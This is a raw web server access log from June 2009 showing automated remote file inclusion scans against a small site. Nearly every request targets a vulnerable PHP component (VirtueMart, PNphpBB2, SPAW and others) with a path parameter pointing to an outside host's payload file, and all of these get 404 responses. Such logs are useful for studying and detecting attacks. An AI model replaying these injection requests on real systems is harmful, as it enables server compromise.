70.85.165.10 - - [08/Jun/2009:02:43:20 -0400] "GET /logs//errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
58.177.251.221 - - [08/Jun/2009:02:43:20 -0400] "GET /logs/access_log.Q109052900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:02:43:20 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:02:43:21 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
122.201.76.100 - - [08/Jun/2009:02:43:22 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
58.177.251.221 - - [08/Jun/2009:02:43:30 -0400] "GET /logs/error_log.Q109051400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:02:43:41 -0400] "GET /logs/access_log.Q109052600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
122.201.76.100 - - [08/Jun/2009:02:43:47 -0400] "GET /logs/error_log.Q109053100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.startenglish.com.br/id.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:43:48 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.startenglish.com.br/id.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:43:48 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.startenglish.com.br/id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:43:55 -0400] "GET /logs/access_log.Q109052500//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:43:55 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:43:56 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
217.147.29.190 - - [08/Jun/2009:02:44:04 -0400] "GET /logs/access_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
217.147.29.190 - - [08/Jun/2009:02:44:04 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [08/Jun/2009:02:44:04 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:02:44:13 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
216.15.161.2 - - [08/Jun/2009:02:44:22 -0400] "GET /logs/access_log.Q109051800%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
216.15.161.2 - - [08/Jun/2009:02:44:22 -0400] "GET /logs/access_log.Q109052700%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
216.15.161.2 - - [08/Jun/2009:02:44:23 -0400] "GET /logs/access_log.Q109051800%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
216.15.161.2 - - [08/Jun/2009:02:44:23 -0400] "GET /logs/access_log.Q109052700%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
122.153.212.195 - - [08/Jun/2009:02:44:33 -0400] "GET /logs/error_log.Q109051400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
122.201.76.100 - - [08/Jun/2009:02:44:38 -0400] "GET /logs/error_log.Q109042700//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:44:39 -0400] "GET /logs/error_log.Q109051400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:44:39 -0400] "GET /logs/error_log.Q109042700//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:44:57 -0400] "GET /logs/access_log.Q109052500//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:44:58 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:44:58 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:45:02 -0400] "GET /logs/access_log.Q109052500//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
195.34.78.110 - - [08/Jun/2009:02:45:03 -0400] "GET //components/com_virtuemart/classes/payment/uk_creditcard.cfg.php?mosConfig-absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
195.34.78.110 - - [08/Jun/2009:02:45:03 -0400] "GET /logs//components/com_virtuemart/classes/payment/uk_creditcard.cfg.php?mosConfig-absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.34.78.110 - - [08/Jun/2009:02:45:03 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/classes/payment/uk_creditcard.cfg.php?mosConfig-absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:02:45:03 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:45:03 -0400] "GET /logs/error_log.Q109051400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:45:03 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:45:22 -0400] "GET /logs/access_log.Q109050300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:45:22 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
58.177.251.221 - - [08/Jun/2009:02:45:25 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:02:45:25 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:02:45:25 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
122.153.212.195 - - [08/Jun/2009:02:45:35 -0400] "GET /logs/access_log.Q109052900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:02:45:36 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:02:45:36 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
122.201.76.100 - - [08/Jun/2009:02:45:37 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:45:38 -0400] "GET /logs/access_log.Q109051800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:45:44 -0400] "GET /logs/access_log.Q109052400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:45:45 -0400] "GET /logs/access_log.Q109052400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:45:53 -0400] "GET /logs/access_log.Q109052900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:45:58 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:45:58 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:46:07 -0400] "GET /logs/access_log.Q109052600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:46:14 -0400] "GET /logs/access_log.Q109052900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:46:14 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:46:15 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:46:15 -0400] "GET /logs/access_log.Q109052600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:46:20 -0400] "GET /logs/access_log.Q109052600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:46:35 -0400] "GET /logs/access_log.Q109052600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:46:46 -0400] "GET /logs/access_log.Q109050300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:46:47 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:46:47 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:46:49 -0400] "GET /logs/access_log.Q109051800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.153.212.195 - - [08/Jun/2009:02:47:32 -0400] "GET /logs/access_log.Q109052500//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:02:47:32 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:02:47:33 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
61.250.85.200 - - [08/Jun/2009:02:47:40 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:02:47:40 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:02:47:40 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:02:47:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.201.76.100 - - [08/Jun/2009:02:48:15 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:48:16 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:48:16 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:48:26 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:48:26 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:48:27 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.153.212.195 - - [08/Jun/2009:02:48:30 -0400] "GET /logs/access_log.Q109052400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
216.75.14.10 - - [08/Jun/2009:02:49:09 -0400] "GET /logs/access_log.Q109052500//xmlsrv/xmlrpc.php HTTP/1.1" 404 243 "-" "Mozilla/5.0"
216.75.14.10 - - [08/Jun/2009:02:49:10 -0400] "GET //xmlsrv/xmlrpc.php HTTP/1.1" 404 216 "-" "Mozilla/5.0"
216.75.14.10 - - [08/Jun/2009:02:49:10 -0400] "GET /logs//xmlsrv/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/5.0"
216.75.14.10 - - [08/Jun/2009:02:49:21 -0400] "GET /logs/error_log.Q109052500//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.59.53.130 - - [08/Jun/2009:02:49:21 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
88.59.53.130 - - [08/Jun/2009:02:49:21 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
88.59.53.130 - - [08/Jun/2009:02:49:24 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
88.59.53.130 - - [08/Jun/2009:02:49:24 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
118.98.212.6 - - [08/Jun/2009:02:49:27 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.tjvil.com/board/data/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
118.98.212.6 - - [08/Jun/2009:02:49:27 -0400] "GET /logs/access_log.Q109052600/akocomments.php?mosConfig_absolute_path=http://www.tjvil.com/board/data/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
118.98.212.6 - - [08/Jun/2009:02:49:27 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://www.tjvil.com/board/data/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.153.212.195 - - [08/Jun/2009:02:49:29 -0400] "GET /logs/access_log.Q109052600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
216.75.14.10 - - [08/Jun/2009:02:49:30 -0400] "GET /logs/error_log.Q109052500//blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 248 "-" "Mozilla/5.0"
195.34.78.110 - - [08/Jun/2009:02:49:40 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_virtuemart/classes/payment/uk_creditcard.cfg.php?mosConfig-absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
122.153.212.195 - - [08/Jun/2009:02:49:55 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:02:49:55 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:02:49:56 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
217.147.30.80 - - [08/Jun/2009:02:50:37 -0400] "GET //components/com_virtuemart/classes/payment/uk_creditcard.cfg.php?mosConfig-absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:02:50:37 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/classes/payment/uk_creditcard.cfg.php?mosConfig-absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:02:50:37 -0400] "GET /logs//components/com_virtuemart/classes/payment/uk_creditcard.cfg.php?mosConfig-absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.34.78.110 - - [08/Jun/2009:02:51:05 -0400] "GET /logs/access_log.Q109052900%20%20//components/com_virtuemart/classes/payment/uk_creditcard.cfg.php?mosConfig-absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
58.177.251.221 - - [08/Jun/2009:02:51:25 -0400] "GET /logs/error_log.Q109041400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
64.182.124.1 - - [08/Jun/2009:02:52:07 -0400] "GET //citywriter/head.php?path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.0" 404 218 "-" "Mozilla/5.0"
64.182.124.1 - - [08/Jun/2009:02:52:07 -0400] "GET /logs//citywriter/head.php?path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.0" 404 223 "-" "Mozilla/5.0"
64.182.124.1 - - [08/Jun/2009:02:52:07 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.0" 404 245 "-" "Mozilla/5.0"
64.182.124.1 - - [08/Jun/2009:02:52:07 -0400] "GET /logs/access_log.Q109053100//citywriter/head.php?path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.0" 404 245 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:02:52:10 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_virtuemart/classes/payment/uk_creditcard.cfg.php?mosConfig-absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
209.172.33.230 - - [08/Jun/2009:02:52:12 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.172.33.230 - - [08/Jun/2009:02:52:12 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.172.33.230 - - [08/Jun/2009:02:52:12 -0400] "GET /logs/access_log.Q109051100%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
80.67.20.178 - - [08/Jun/2009:02:52:31 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
80.67.20.178 - - [08/Jun/2009:02:52:31 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:02:52:42 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_virtuemart/classes/payment/uk_creditcard.cfg.php?mosConfig-absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:02:52:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.59.53.130 - - [08/Jun/2009:02:53:08 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
88.59.53.130 - - [08/Jun/2009:02:53:08 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
88.59.53.130 - - [08/Jun/2009:02:53:10 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
88.59.53.130 - - [08/Jun/2009:02:53:10 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
64.182.124.1 - - [08/Jun/2009:02:53:17 -0400] "GET /logs/access_log.Q109053100%20%20//citywriter/head.php?path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.0" 404 247 "-" "Mozilla/5.0"
64.182.124.1 - - [08/Jun/2009:02:53:17 -0400] "GET /logs/access_log.Q109051600%20%20//citywriter/head.php?path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.0" 404 247 "-" "Mozilla/5.0"
195.34.78.110 - - [08/Jun/2009:02:53:37 -0400] "GET /logs/access_log.Q109052900//components/com_virtuemart/classes/payment/uk_creditcard.cfg.php?mosConfig-absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:02:53:39 -0400] "GET /logs/error_log.Q109041400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:54:15 -0400] "GET /logs/error_log.Q109041400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
